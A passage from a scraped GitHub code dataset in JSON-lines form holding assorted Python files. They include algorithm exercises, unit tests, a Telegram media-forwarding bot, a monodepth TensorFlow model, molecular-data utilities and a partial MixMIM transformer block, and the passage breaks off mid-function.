max(res, i - d[prefix - 1])\n\n if not prefix in d:\n d[prefix] = i\n\n return res\n\n\n\n\n\nprint(Solution().longestWPI([6,5,9,6,9,9,2]))\n\n\n\n","repo_name":"224nth/leetcode","sub_path":"problems/lc_1124.py","file_name":"lc_1124.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73729088482","text":"#!/usr/bin/env python3\n\n\"\"\"\nCounts the number of title lines in a FCP7 XML file.\n\nUsage: python3 trad_count.py input/XMLNAME\n\n\"\"\"\nfrom lxml import etree\nimport sys\n\ninput_file = sys.argv[1]\n\nfilename_txt = input_file[:-4] + '_count.txt'\n\ntree = etree.parse(input_file)\n\nroot = tree.getroot()\n\nsequence = root.find('sequence')\n\nmedia = sequence.find('media')\n\nvideo = media.find('video')\n\ndef get_track_list(video_or_audio):\n return(video_or_audio.findall('track'))\n\ntrack_list = get_track_list(video)\n \nv1 = track_list[0]\n\ntitle_list = v1.findall('generatoritem')\n\nwith open(filename_txt, 'w') as txt_output:\n line_list = []\n for title in title_list:\n effect = title.find('effect')\n parameter = effect.find('parameter')\n value = parameter.find('value')\n text = value.text\n letter_count = 0\n if text == None:\n print('pass')\n continue\n line = \"\"\n for letter in text:\n if letter in ['\\n','\\r','\\n\\r','\\r\\n']:\n line += letter\n letter_count +=1\n line_list.append(line)\n line = \"\"\n else:\n line += letter\n letter_count += 1\n if line:\n line_list.append(line)\n letter_count = 0\n\n count = 0\n short_line_list = [line for line in line_list if len(line) > 1]\n for line in short_line_list:\n count += 1\n num_line = str(count) + ': ' + line \n txt_output.write(num_line)\n txt_output.write('\\n')\n\nprint(count)\n","repo_name":"JimmyLamothe/trad","sub_path":"OLD/trad_count.py","file_name":"trad_count.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18955661991","text":"# @Lx0988 | @0FLX | 0AIB\nfrom AutoForward import CHANNEL_IDS\nimport logging, asyncio\nlogger = logging.getLogger(__name__)\nfrom pyrogram import Client, filters, enums\nfrom pyrogram.errors import FloodWait\n\nmedia_filter = filters.document | filters.video | filters.audio\n \n@Client.on_message(filters.chat(CHANNEL_IDS) & media_filter)\nasync def forward(client, update): \n try: \n await asyncio.sleep(300)\n await client.copy_message(\n chat_id=-1001857977699,\n from_chat_id=update.chat.id,\n message_id=update.id,\n caption=update.caption,\n parse_mode=enums.ParseMode.MARKDOWN\n )\n\n except FloodWait as e:\n await asyncio.sleep(e.value)\n\n\n@Client.on_message(filters.chat(-1001846691219) & filters.group & media_filter)\nasync def forward2auto(client, update):\n try: \n await asyncio.sleep(20)\n await client.copy_message(\n chat_id=-1001427335527,\n from_chat_id=-1001846691219,\n message_id=update.id,\n caption=f\"**{update.caption}**\" + \"\\n\\n\" + \"**@DXClassic**\",\n parse_mode=enums.ParseMode.MARKDOWN\n )\n\n except FloodWait as e:\n await asyncio.sleep(e.value)\n","repo_name":"FutureAIRobot/Forward-Client","sub_path":"AutoForward/plugins/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"23107305837","text":"#!/usr/bin/python3\n\"\"\"\nUnit tests for models/engine/file_storage.py\n\"\"\"\nimport unittest\nfrom models.base_model import BaseModel\nfrom models.engine.file_storage import FileStorage\n\n\nclass TestFileStorage(unittest.TestCase):\n \"\"\"Unittest for class FileStorage\"\"\"\n\n def test_file_path_type(self):\n \"\"\"Check type of __file_path attribute\"\"\"\n self.assertEqual(type(FileStorage._FileStorage__file_path), str)\n\n def test_objects_type(self):\n \"\"\"Check type of __objects attribute\"\"\"\n self.assertEqual(type(FileStorage._FileStorage__objects), dict)\n\n def test_all_method(self):\n \"\"\"Check methods new(), all() and reload()\"\"\"\n storage = FileStorage()\n base1 = BaseModel()\n storage.new(base1)\n string_rep = f\"{base1.__class__.__name__}.{base1.id}\"\n self.assertEqual(storage.all()[string_rep], base1)\n all_objs = storage.all()\n self.assertIn(base1, all_objs.values())\n storage.reload()\n all_objs_reloaded = storage.all()\n self.assertIn(base1, all_objs_reloaded.values())\n\n def test_save_fs(self):\n \"\"\"Check save() method\"\"\"\n base2 = BaseModel()\n updated_at = base2.updated_at\n base2.save()\n last_updated_at = base2.updated_at\n self.assertNotEqual(updated_at, last_updated_at)\n\n def test_path(self):\n \"\"\"Create an FileStorage\"\"\"\n self.storage = FileStorage()\n self.path = \"file.json\"\n self.assertEqual(self.storage._FileStorage__file_path, 'file.json')\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"cristian-encalada/holbertonschool-AirBnB_clone","sub_path":"tests/test_models/test_engine/test_file_storage.py","file_name":"test_file_storage.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"15069166195","text":"#!/usr/bin/python3 \n'''\n Author : Karthikeyan_01\n Algo : Merge Sort \n Time Comp : O(n logn)\n'''\n\n\ndef merge(a , L , mid , R):\n n1 = mid - L + 1\n n2 = R - mid\n \n k = L\n\n Left = [0] * (n1)\n Right= [0] * (n2) \n\n for i in range(0 , n1):\n Left[i] = a[i+L]\n\n for j in range(0 , n2):\n Right[j] = a[j + mid + 1]\n\n i = 0\n j = 0\n while i < n1 and j < n2:\n if Left[i] <= Right[j]:\n a[k] = Left[i]\n k += 1\n i += 1\n else:\n a[k] = Right[j]\n k += 1\n j += 1\n\n while i < n1:\n a[k] = Left[i]\n i += 1\n k += 1\n while j < n2:\n a[k] = Right[j]\n j += 1\n k += 1\n\n\n\ndef mergesort(a , L , R):\n if L < R:\n mid = (L + R)//2\n mergesort(a , L , mid)\n mergesort(a , mid + 1 , R)\n merge(a , L , mid , R)\n\n\nif __name__ == '__main__':\n a = [ 2 , 7 , 3 , 5 , 4 , 1]\n n = len(a) \n print(\"Array Before Sorting\")\n for i in a:\n print(i , end = ' ')\n\n\n mergesort(a , 0 , n - 1)\n\n print('\\n')\n print(\"Array After Sorting\")\n for i in a:\n print(i , end=' ')\n\n\n\n","repo_name":"aniketsharma00411/algorithmsUse","sub_path":"Python/Sorting/merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"54"} +{"seq_id":"42011342642","text":"\n# You are given the following information, but you may prefer to do some research for yourself.\n\n# 1 Jan 1900 was a Monday.\n# Thirty days has September,\n# April, June and November.\n# All the rest have thirty-one,\n# Saving February alone,\n# Which has twenty-eight, rain or shine.\n# And on leap years, twenty-nine.\n# A leap year occurs on any year evenly divisible by 4, but not on a century unless it is divisible by 400.\n# How many Sundays fell on the first of the month during the twentieth century (1 Jan 1901 to 31 Dec 2000)?\n\n\ndef reset_week(days):\n days = 0 if days > 5 else days + 1\n return days\n\ndef get_days_count_in_month(year, month):\n if month == 1:\n if not (year + 1900) % 4:\n if not (year + 1900) % 100 and (year + 1900) % 400:\n return 28\n else:\n return 29\n else:\n return 28\n if month in (3, 5, 8, 10):\n return 30\n return 31\n \ndef get_sundays():\n years = 30\n months = 0\n days = 0\n day_of_week = 1\n sundays_count = 0\n for years in range(0, 101):\n for months in range(12):\n for days in range(get_days_count_in_month(years, months)):\n if days == 0 and day_of_week == 0 and years > 0:\n sundays_count += 1\n day_of_week = reset_week(day_of_week)\n days = 0\n months = 0\n return sundays_count\n\nprint(get_sundays())\n","repo_name":"armou/euler-project","sub_path":"problem19/problem19.py","file_name":"problem19.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"33689580288","text":"'''\nMODEL :: Tensorflow Computer Vision Platform\nDATE :: 2020-01-24\nFILE :: model.py \n'''\n\nfrom __future__ import absolute_import, division, print_function\n\nimport numpy as np\nimport tensorflow as tf\n\n# import mde engine \nfrom engine.mde.img_proc import ImgProc\nfrom engine.mde.mde_proc import MdeProc\nfrom engine.mde.mde_postproc import MdePostproc\nfrom engine.mde.mde_loss import MdeLoss\n\n# import utils \nfrom utils.bilinear_sampler import *\n\n# import nn kits\nfrom nn.nn_kits import NnKits\nfrom nn.unet import UNet\nfrom nn.vgg import Vgg\nfrom nn.resnet import Resnet\nfrom nn.resnet18 import Resnet18\nfrom nn.resvgg import Resvgg\nfrom nn.resASPP import ResASPP\n\n\nclass MonodepthModel(object):\n \"\"\"monodepth model\"\"\"\n\n def __init__(self, params, mode, left, right, reuse_variables=None, model_index=0): \n self.params = params\n self.mode = mode\n self.left = left\n self.right = right\n\n self.model_collection = ['model_' + str(model_index)]\n\n self.reuse_variables = reuse_variables\n\n # init toolkits \n self.nn = NnKits()\n self.imgproc = ImgProc()\n self.mdeproc = MdeProc(self.left)\n self.mde_loss = MdeLoss()\n\n # init codec\n self.encoder(self.params.encoder)\n self.decoder()\n\n # init postproc\n if not self.mode == 'train':\n self.postproc = MdePostproc(self.left)\n\n # run model/output\n self.build_model()\n self.build_outputs()\n\n if not self.mode == 'train':\n return\n\n # run loss\n self.build_losses()\n\n # Model Encoder and Decoder\n def encoder(self, encoder_type='vgg'):\n self.stages = 4 \n if encoder_type == 'vgg':\n self.enc = Vgg()\n self.stages = 6 \n elif encoder_type == 'resnet':\n self.enc = Resnet()\n self.stages = 5 \n elif encoder_type == 'resvgg':\n self.enc = Resvgg()\n self.stages = 5\n elif encoder_type == 'resASPP':\n self.enc = ResASPP() \n elif encoder_type == 'resnet18':\n self.enc = Resnet18() \n else:\n print('>>>{} encoder is not supported. <<<'.format(encoder_type))\n exit()\n\n def decoder(self): \n self.dec = UNet(self.stages) \n\n def build_model(self):\n with tf.compat.v1.variable_scope('build_model'):\n with tf.compat.v1.variable_scope('model', reuse=self.reuse_variables):\n\n self.left_pyramid = self.imgproc.scale_pyramid(self.left, 4) \n if self.mode == 'train':\n self.right_pyramid = self.imgproc.scale_pyramid(self.right, 4)\n\n if self.params.do_stereo:\n self.model_input = tf.concat([self.left, self.right], 3)\n else:\n self.model_input = self.left\n\n #build model\n self.enc.forward(self.model_input)\n self.dec.forward(self.enc) \n\n def build_outputs(self):\n self.disp1, self.disp2, self.disp3, self.disp4 = self.dec.disp1, \\\n self.dec.disp2, \\\n self.dec.disp3, \\\n self.dec.disp4\n # STORE DISPARITIES\n with tf.compat.v1.variable_scope('disparities'):\n self.disp_est = [self.disp1, self.disp2, self.disp3, self.disp4]\n self.disp_left_est = [tf.expand_dims(d[:,:,:,0], 3) for d in self.disp_est]\n self.disp_right_est = [tf.expand_dims(d[:,:,:,1], 3) for d in self.disp_est]\n\n if not self.mode == 'train':\n self.disp_est = self.disp1[0,:,:,0]\n self.disp_est_right = self.disp1[0,:,:,1] \n self.disp_est_pp = self.postproc.post_process(self.disp1)\n self.disp_est_ppp = self.postproc.post_process_plus(self.disp1)\n return\n\n # GENERATE IMAGES\n with tf.compat.v1.variable_scope('images'):\n self.left_est = [self.mdeproc.generate_image_left(self.right_pyramid[i], self.disp_left_est[i]) for i in range(4)]\n self.right_est = [self.mdeproc.generate_image_right(self.left_pyramid[i], self.disp_right_est[i]) for i in range(4)]\n\n # LR CONSISTENCY\n with tf.compat.v1.variable_scope('left-right'):\n self.right_to_left_disp = [self.mdeproc.generate_image_left(self.disp_right_est[i], self.disp_left_est[i]) for i in range(4)]\n self.left_to_right_disp = [self.mdeproc.generate_image_right(self.disp_left_est[i], self.disp_right_est[i]) for i in range(4)]\n\n # DISPARITY SMOOTHNESS\n with tf.compat.v1.variable_scope('smoothness'):\n self.disp_left_smoothness = self.mdeproc.get_disparity_smoothness(self.disp_left_est, self.left_pyramid)\n self.disp_right_smoothness = self.mdeproc.get_disparity_smoothness(self.disp_right_est, self.right_pyramid)\n\n\n def build_losses(self):\n with tf.compat.v1.variable_scope('losses', reuse=self.reuse_variables):\n self.mde_loss.init_model_output(self)\n\n self.image_loss = self.mde_loss.get_image_loss()\n self.lr_loss = self.mde_loss.get_lr_losss()\n self.disp_loss = self.mde_loss.get_dist_loss()\n\n # TOTAL LOSS\n self.total_loss = self.image_loss + \\\n self.params.lr_loss_weight * self.lr_loss + \\\n self.params.disp_gradient_loss_weight * self.disp_loss \n\n return self.total_loss\n\n\n","repo_name":"kspeng/dev-monodepth-tensorflow-v2.x","sub_path":"engine/mde/mde_model.py","file_name":"mde_model.py","file_ext":"py","file_size_in_byte":5756,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"21179716333","text":"class HitLocation:\n def __init__(self, lowerBound, upperBound, name):\n self.lowerBound = lowerBound\n self.upperBound = upperBound\n self.name = name\n self.conditions = []\n def addCondition(self, condition, duration):\n self.conditions.append([condition, duration])\n def decrementConditions(self):\n outStr = ''\n for a in self.conditions:\n if a[1] > 0:\n a[1] = a[1] - 1\n outStr = outStr + self.name + ' is now ' + a[0] + ' for ' + str(a[1]) + ' intervals.\\n'\n return outStr.rstrip('\\n')\n def cleanupConditions(self):\n tempList = self.conditions.copy()\n self.conditions.clear()\n condLength = len(tempList)\n cleanedConditions = []\n while condLength > 0:\n c = tempList.pop(0)\n if c[1] != 0:\n self.conditions.append(c)\n else:\n cleanedConditions.append(c[0])\n condLength = condLength - 1\n return cleanedConditions\n def endCondition(self, condName):\n tempList = self.conditions.copy()\n self.conditions.clear()\n condLength = len(tempList)\n cleanedConditions = []\n while condLength > 0:\n c = tempList.pop(0)\n if c[0] != condName:\n self.conditions.append(c)\n else:\n cleanedConditions.append(c[0])\n condLength = condLength - 1\n return cleanedConditions\n def replaceCondition(self, conditionToRemove, conditionToAdd, duration):\n outStr = ''\n tempList = self.conditions.copy()\n self.conditions.clear()\n condLength = len(tempList)\n while condLength > 0:\n c = tempList.pop(0)\n if c[0] != conditionToRemove:\n self.conditions.append(c)\n else:\n outStr = outStr + self.name + ' is no longer ' + c[0]\n self.conditions.append([conditionToAdd, duration])\n condLength = condLength - 1\n if outStr != '':\n return outStr + ' but is now ' + conditionToAdd + ' for ' + str(duration)\n else: return 'Replacement failed, could not find ' + conditionToRemove\n def readConditions(self):\n outStr = ''\n for c in self.conditions:\n if c[1] < 0:\n outStr = outStr + self.name + ' is ' + c[0] + ' until further notice.\\n' \n else:\n outStr = outStr + self.name + ' is ' + c[0] + ' for ' + str(c[1]) + ' intervals.\\n'\n if outStr == '':\n return self.name + ' has no conditions.\\n'\n else:\n return outStr\n","repo_name":"SpessMahrine/AdEva3CombAsst","sub_path":"HitLocation.py","file_name":"HitLocation.py","file_ext":"py","file_size_in_byte":2657,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"11481244256","text":"from util import*\n\nimport numpy as np\nfrom scipy.spatial.distance import pdist\n\ndef toDistance(R):\n '''\n This function takes a numpy array containing positions and returns it as distances.\n \n Parameters:\n -R:\n numpy array containing positions for every atom in every sample\n Dimensions: (n_samples,n_atoms,n_dimensions)\n \n Returns:\n -y:\n numpy array containing distances for every atom in every sample\n Dimensions: (n_samples,n_atoms*(n_atoms-1)/2)\n '''\n \n shape=R.shape\n try:\n dim=shape[2]\n except:\n print(\"toDistance: wrong dimensions\")\n return\n if shape[1]<2:\n print(\"not enough atoms\")\n return\n\n y=[]\n\n for i in range(len(R)): ##goes through samples\n y.append(pdist(R[i]))\n\n y=np.array(y)\n return y\n\ndef r_to_desc(self):\n '''\n Returns the position array as an array of desired description.\n This description is solely used for clusterisation.\n Default is inverse distances.\n \n Parameters:\n -R:\n numpy array containing positions for every atom in every sample\n Dimensions: (n_samples,n_atoms,n_dimensions)\n \n Returns:\n numpy array containing inverse distances for every atom in every sample\n Dimensions: (n:samples,n_atoms*(n_atoms-1)/2)\n '''\n dataset=self.dataset\n R=dataset['R']\n return 1. / toDistance(R)\n\ndef extract_E(self):\n dataset=self.dataset\n E=dataset['E']\n return np.array(E)\n\ndef extract_R_concat(self):\n dataset=self.dataset\n R=dataset['R']\n n_samples,n_atoms,n_dim=R.shape\n R=np.reshape(R,(n_samples,n_atoms*n_dim))\n return np.array(R)\n\ndef extract_F_concat(self):\n dataset=self.dataset\n F=dataset['F']\n n_samples,n_atoms,n_dim=F.shape\n F=np.reshape(F,(n_samples,n_atoms*n_dim))\n return np.array(F)\n\ndef mean_squared_error_sample_wise(x,y):\n err=(np.array(x)-np.array(y))**2\n return err.mean(axis=1)\n\ndef lowest_variance_ind(a):\n var_sum=[]\n for s in a:\n b=a-s\n var_sum.append(np.sum(np.square(b)))\n return np.argmin(var_sum)\n\ndef within_cluster_lowest_variance(db,cl_ind,err):\n new_ind=[]\n var=db.vars[db.para['generate_training_data']['var_index']]\n for ind in cl_ind:\n R=var[ind]\n lv_ind=lowest_variance_ind(R)\n new_ind.append(ind[lv_ind])\n\n return new_ind\n\ndef within_cluster_highest_error(db,cl_ind,err):\n new_ind=[]\n for ind in cl_ind:\n cl_err=err[ind]\n argmax=np.argmax(cl_err)\n new_ind.append(ind[argmax])\n\n return new_ind\n\ndef within_high_error_cluster_lowest_variance(db,cl_ind,err):\n new_ind=[]\n var=db.vars[db.para['generate_training_data']['var_index']]\n N=db.para['generate_training_data']['n_he_clusters']\n\n #find highest error clusters\n mse=[np.mean(err[x]) for x in cl_ind]\n argsort=np.argsort(mse)\n new_cl_ind=np.array(cl_ind)[argsort[-N:]]\n\n for ind in new_cl_ind:\n R=var[ind]\n lv_ind=lowest_variance_ind(R)\n new_ind.append(ind[lv_ind])\n\n return new_ind\n\ndef weighted_distribution(N,weights):\n weights=np.array(weights)/np.sum(weights)\n a=(weights*N)\n b=a.astype(int)\n c=a-b\n s=np.sum(b)\n\n for i in range(N-s):\n arg=np.argmax(c)\n c[arg]=0\n b[arg]=b[arg]+1\n\n return b\n\ndef db_indices(self):\n return np.arange(len(self.dataset))\n\ndef within_cluster_weighted_err_N(db,cl_ind,err):\n new_ind=[]\n N=db.para['generate_training_data']['n_points']\n\n #find cluster errors and pops\n mse=np.array([np.mean(err[x]) for x in cl_ind])\n pop=np.array([len(x) for x in cl_ind])\n\n weights=(mse/np.sum(mse))*(pop/np.sum(pop))\n Ns=weighted_distribution(N,weights)\n\n for i in range(len(cl_ind)):\n ind=np.array(cl_ind[i])\n cl_err=err[ind]\n ni=Ns[i]\n argmax=np.argsort(-cl_err)[:ni]\n new_ind.extend(ind[argmax])\n\n return new_ind\n\ndef MD17_extract_E(self):\n\n if getattr(self,'dataset_npz',None) is None:\n dataset=self.dataset\n E=[]\n l=len(dataset) \n for i in range(l):\n E.append(dataset[i]['energy'].numpy())\n print(f\"Exctracting db energies: {i/l*100:.0f}%\",end='\\r')\n\n print(\"\")\n else:\n E=np.reshape(self.dataset_npz['E'],(len(self.dataset_npz['E']),-1))\n return np.array(E)\n\ndef MD17_extract_F(self):\n if getattr(self,'dataset_npz',None) is None:\n dataset=self.dataset\n F=[]\n l=len(dataset) \n for i in range(l):\n F.append(dataset[i]['forces'].numpy())\n print(f\"Exctracting db forces: {i/l*100:.0f}%\",end='\\r')\n\n print(\"\")\n else:\n F=self.dataset_npz['F']\n return np.array(F).reshape(len(F),-1)\n\ndef MD17_R_to_dist(self):\n if getattr(self,'dataset_npz',None) is None:\n dataset=self.dataset\n R=[]\n l=len(dataset) \n for i in range(l):\n R.append(dataset[i]['_positions'].numpy())\n print(f\"Exctracting db positions: {i/l*100:.0f}%\",end='\\r')\n\n print(\"\")\n else:\n R=self.dataset_npz['R']\n R=toDistance(np.array(R))\n return R\n\ndef load_npz_file(self,path,*args):\n self.dataset=np.load(path)\n\ndef load_MD17_file_molecule(self,path,molecule=None,npz_data=None):\n if molecule is None:\n print_warning(\"No molecule selected for MD17 model (no second arg given). Entire dataset taken.\")\n from schnetpack.datasets import MD17\n data=MD17(path,molecule=molecule)\n\n if npz_data is not None:\n self.dataset_npz=np.load(npz_data)\n else:\n self.dataset_npz=None\n\n self.dataset=data\n\ndef get_info_split_train_indices(db,model_path,data_path):\n path='Info/split.npz'\n split=np.load(path)\n return split['train_idx']\n\ndef get_info_split_train_indices_preload(db,data_path):\n split=np.load(data_path)\n return split['train_idx']\n\ndef get_info_savep_train_indices_preload(db,data_path):\n with open(data_path,'rb') as file:\n save=pickle.loads(file.read())\n return save['training_indices']\n\ndef save_split_MD17(db,ind,name):\n dataset=db.dataset\n para=db.para['generate_training_data']\n ind_rest= np.delete(np.arange(len(dataset)),ind)\n val=np.random.choice(ind_rest,para['n_val'],replace=False)\n test=np.delete(ind_rest,val)\n\n path=os.path.join(db.info_path,'split.npz')\n np.savez(path,train_idx=ind,val_idx=val,test_idx=test)\n db.step_dataset_path=path\n\ndef sgdml_dataset_fix_path(db):\n full_path = os.path.dirname(os.path.realpath(__file__))\n data_path=db.args['dataset_path']\n\n dataset=dict(np.load(data_path))\n dataset['name']=os.path.join(full_path,data_path)\n np.savez_compressed(data_path,**dataset)\n\n\n\n","repo_name":"monopsony/Improved-Learning","sub_path":"descri.py","file_name":"descri.py","file_ext":"py","file_size_in_byte":6770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19286437838","text":"#!/usr/bin/python3\nimport face_recognition\nimport json\n\nbase_path = \"../faces/face\"\n\npeople = [\n (\"1\", \"Gargamel\"),\n (\"2\", \"Marija\"),\n (\"3\", \"Ana\"),\n (\"4\", \"Maja\"),\n (\"5\", \"Irena\"),\n (\"6\", \"Mojca\"),\n (\"7\", \"Nina\"),\n (\"8\", \"Mateja\"),\n (\"9\", \"Natasa\"),\n (\"10\", \"Andreja\"),\n]\n\nout = []\n\nfor (path, name) in people:\n image = face_recognition.load_image_file(base_path + path + \".png\")\n\n boxes = face_recognition.face_locations(image)\n\n encoding = face_recognition.face_encodings(\n image, boxes, num_jitters=5, model=\"large\"\n )\n \n out.append({\"name\": name, \"encoding\": encoding[0].tolist()})\n\nwith open(\"../data/encoding_data.json\", \"w\") as outfile:\n json.dump(out, outfile)\n","repo_name":"mokot/development-of-intelligent-systems","sub_path":"task1/helper/face_encodings.py","file_name":"face_encodings.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73018852321","text":"'''\nGiven a non-empty array of integers, find the top K elements which have the\nhighest frequency in the array. If two numbers have the same frequency then\nthe larger number should be given preference.\n\nExample 1:\n\nInput:\nN = 6\nA[] = {1,1,1,2,2,3}\nK = 2\nOutput: 1 2\nExample 2:\n\nInput:\nN = 8\nA[] = {1,1,2,2,3,3,3,4}\nK = 2\nOutput: 3 2\nExplanation: Elements 1 and 2 have the\nsame frequency ie. 2. Therefore, in this\ncase, the answer includes the element 2\nas 2 > 1.\nUser Task:\nThe task is to complete the function TopK() that takes the array and integer K\nas input and returns a list of top K frequent elements.\n\nExpected Time Complexity : O(NlogN)\nExpected Auxilliary Space : O(N)\n\nConstraints:\n1 <= N <= 103\n1<=A[i]<=104\n\n'''\n\n\ndef TopK(arr, n, k):\n # freq count\n mp = dict()\n for ele in arr:\n if ele in mp:\n mp[ele] = mp.get(ele) + 1\n else:\n mp[ele] = 1\n print(\"arr:\", arr)\n print(\"mp:\", mp)\n\n # sort dict by freq values\n # and then for each freq. values as key sorted descending order.\n mp_val = dict()\n for key, val in mp.items():\n if val in mp_val:\n mp_val.get(val).append(key)\n else:\n mp_val[val] = [key]\n print(\"mp_val:\", mp_val)\n sorted_mp_val = sorted(mp_val.items(), key=lambda x: (x[0], x[1]), reverse=True)\n print(\"sorted_mp_val:\", sorted_mp_val)\n cnt = 0\n for i in range(len(sorted_mp_val)):\n for j in range(len(sorted_mp_val[i][1])):\n print(sorted_mp_val[i][1][j], end=\" \")\n if k == cnt:\n break\n cnt += 1\n\n\nif __name__ == '__main__':\n # Output: 5,4 2\n arr = [4, 5, 5, 6, 4]\n print(arr, TopK(arr, 5, 2))\n\n '''\n\n # Output: 1 2\n arr = [1, 1, 1, 2, 2, 3]\n print(arr, TopK(arr, 6, 2))\n\n arr = [1, 1, 2, 2, 3, 3, 3, 4]\n TopK(arr, 8, 2)\n '''\n","repo_name":"ferryleaf/GitPythonPrgms","sub_path":"hashing/top_K_Frequent_Elements_in_Array.py","file_name":"top_K_Frequent_Elements_in_Array.py","file_ext":"py","file_size_in_byte":1846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74228820322","text":"class color:\n import os\n T = os.getenv('TERM')\n if ( T=='cygwin' or T=='mingw' ) :\n HEADER = '\\033[01;35m'\n BLUE = '\\033[01;34m'\n GREEN = '\\033[01;32m'\n WARNING = '\\033[01;33m'\n FAIL = '\\033[01;31m'\n RED = FAIL\n ENDC = '\\033[0m'\n else :\n HEADER = '\\033[95m'\n BLUE = '\\033[94m'\n GREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n RED = FAIL\n ENDC = '\\033[0m'\n\n def disable(self):\n self.HEADER = ''\n self.OKBLUE = ''\n self.OKGREEN = ''\n self.WARNING = ''\n self.FAIL = ''\n self.RED = ''\n self.ENDC = ''\n","repo_name":"pyscf/nao","sub_path":"pyscf/nao/m_color.py","file_name":"m_color.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"54"} +{"seq_id":"27385600130","text":"import random\nimport math\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom util.pos_embed import get_2d_sincos_pos_embed\n\nfrom timm.models.layers import trunc_normal_, to_2tuple\nfrom timm.models.swin_transformer import PatchMerging\nfrom timm.models.swin_transformer import window_partition, window_reverse\nfrom timm.models.vision_transformer import PatchEmbed, Block, Mlp, DropPath\nfrom timm.models.registry import register_model\nfrom torch.utils.checkpoint import checkpoint\n\n\nclass WindowAttention(nn.Module):\n\n def __init__(self, dim, window_size, num_heads, qkv_bias=True, attn_drop=0., proj_drop=0.):\n\n super().__init__()\n self.dim = dim\n self.window_size = window_size # Wh, Ww\n self.num_heads = num_heads\n head_dim = dim // num_heads\n self.scale = head_dim ** -0.5\n\n # define a parameter table of relative position bias\n self.relative_position_bias_table = nn.Parameter(\n torch.zeros((2 * window_size[0] - 1) * (2 * window_size[1] - 1), num_heads)) # 2*Wh-1 * 2*Ww-1, nH\n\n # get pair-wise relative position index for each token inside the window\n coords_h = torch.arange(self.window_size[0])\n coords_w = torch.arange(self.window_size[1])\n coords = torch.stack(torch.meshgrid([coords_h, coords_w])) # 2, Wh, Ww\n coords_flatten = torch.flatten(coords, 1) # 2, Wh*Ww\n relative_coords = coords_flatten[:, :, None] - coords_flatten[:, None, :] # 2, Wh*Ww, Wh*Ww\n relative_coords = relative_coords.permute(1, 2, 0).contiguous() # Wh*Ww, Wh*Ww, 2\n relative_coords[:, :, 0] += self.window_size[0] - 1 # shift to start from 0\n relative_coords[:, :, 1] += self.window_size[1] - 1\n relative_coords[:, :, 0] *= 2 * self.window_size[1] - 1\n relative_position_index = relative_coords.sum(-1) # Wh*Ww, Wh*Ww\n self.register_buffer(\"relative_position_index\", relative_position_index)\n\n self.qkv = nn.Linear(dim, dim * 3, bias=qkv_bias)\n self.attn_drop = nn.Dropout(attn_drop)\n self.proj = nn.Linear(dim, dim)\n self.proj_drop = nn.Dropout(proj_drop)\n\n trunc_normal_(self.relative_position_bias_table, std=.02)\n self.softmax = nn.Softmax(dim=-1)\n\n def forward(self, x, mask = None):\n B_, N, C = x.shape\n qkv = self.qkv(x).reshape(B_, N, 3, self.num_heads, C // self.num_heads).permute(2, 0, 3, 1, 4)\n q, k, v = qkv.unbind(0) # make torchscript happy (cannot use tensor as tuple)\n\n q = q * self.scale\n attn = (q @ k.transpose(-2, -1))\n\n relative_position_bias = self.relative_position_bias_table[self.relative_position_index.view(-1)].view(\n self.window_size[0] * self.window_size[1], self.window_size[0] * self.window_size[1], -1) # Wh*Ww,Wh*Ww,nH\n relative_position_bias = relative_position_bias.permute(2, 0, 1).contiguous() # nH, Wh*Ww, Wh*Ww\n attn = attn + relative_position_bias.unsqueeze(0)\n\n if mask is not None:\n mask = mask.reshape(B_, 1, 1, N)\n mask_new = mask * mask.transpose(2, 3) + (1 - mask) * (1 - mask).transpose(2, 3)\n mask_new = 1 - mask_new\n if mask_new.dtype == torch.float16:\n attn = attn - 65500 * mask_new\n else:\n attn = attn - 1e30 * mask_new\n attn = self.softmax(attn)\n attn = self.attn_drop(attn)\n\n x = (attn @ v).transpose(1, 2).reshape(B_, N, C)\n x = self.proj(x)\n x = self.proj_drop(x)\n return x\n\nclass MixMIMBlock(nn.Module):\n\n def __init__(self, dim, input_resolution, num_heads, window_size=7,\n mlp_ratio=4., qkv_bias=True, drop=0., attn_drop=0., drop_path=0.,\n act_layer=nn.GELU, norm_layer=nn.LayerNorm):\n super().__init__()\n self.dim = dim\n self.input_resolution = input_resolution\n self.num_heads = num_heads\n self.window_size = window_size\n self.mlp_ratio = mlp_ratio\n if min(self.input_resolution) <= self.window_size:\n # if window size is larger than input resolution, we don't partition windows\n self.window_size = min(self.input_resolution)\n\n self.norm1 = norm_layer(dim)\n self.attn = WindowAttention(\n dim, window_size=to_2tuple(self.window_size), num_heads=num_heads, qkv_bias=qkv_bias,\n attn_drop=attn_drop, proj_drop=drop)\n\n self.drop_path = DropPath(drop_path) if drop_path > 0. else nn.Identity()\n self.norm2 = norm_layer(dim)\n mlp_hidden_dim = int(dim * mlp_ratio)\n self.mlp = Mlp(in_features=dim, hidden_features=mlp_hidden_dim, act_layer=act_layer, drop=drop)\n\n def forward(self, x, 